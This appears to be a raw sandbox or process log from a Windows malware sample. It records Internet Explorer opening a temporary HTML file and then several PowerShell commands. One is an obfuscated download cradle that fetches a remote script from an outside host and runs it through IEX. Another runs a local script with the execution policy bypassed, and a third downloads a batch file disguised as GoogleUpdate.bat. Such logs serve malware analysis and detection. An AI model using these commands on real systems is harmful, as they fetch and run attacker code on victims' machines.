iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\4.html
5292powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
1160powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
7000powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3468